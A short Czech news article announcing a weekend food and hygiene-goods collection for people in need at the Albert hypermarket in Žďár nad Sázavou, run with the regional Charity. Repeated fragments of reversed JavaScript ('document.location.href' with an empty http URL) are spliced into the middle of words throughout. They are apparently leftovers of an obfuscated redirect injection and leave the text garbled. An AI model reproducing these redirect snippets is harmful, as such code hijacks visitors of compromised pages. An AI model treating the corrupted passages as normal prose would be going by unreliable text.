Rainbow page separator

Potravinová sbírka bude ve žďárském HyperAlbertu celý víkend

Čtvrtek, 2. prosince 2021

Žďár nad Sázavou / Potravinová sbírka pro potřebné pokračuje o víkendu 4. a 5. prosince ve Žďáře. Ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát ji pořádá společnost Albert, uskuteční se v Hypermarketu Albert ve Strojírenské ulici a opět bude spojená s Oblastní chari[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou Žďár nad Sázavou, respektive jejími klienty. „Sbírka se uskuteční po oba dny v době 8 do 20 hodin a výtěžek podpoří klienty naší charitní záchranné sítě, která pomáhá lidem v nouzi,“ upřesnila Lenka Šustrová z Oblastní charity Žďár nad Sázavou.
U vstupu do prodejny dostane dárce nákupní lístek, podle kterého pak vybere zboží, zakoupí jej a zanechá v označených koších, stejně jako [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu bylo u předchozích potravinových sbírek. Vítány jsou trvanlivé potraviny jako například konzervy, těs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toviny, luštěniny, rýže, cukr, polévky, trvanlivé nebo sušené mléko, čaj, káva, kakao, med, marmelády, olej, piškoty, suchary, cereálie, pudinky nebo ovocné přesnídávky. Z drogistických potřeb [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jsou zejména prací prášky či gely, jar a podobné prostředky, mýdla, sprchové gely, šampony, jednorázové pleny, vlhčené ubrousky nebo dezinfekce.
Pokud příchozí nebudou mít dost času nakoupit sami, ale přes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to chtějí podpořit ty, kterým se právě moc nedaří, mohou vložit peníze do zapečetěné kasičky umístěné pod dohledem dobrovolníků.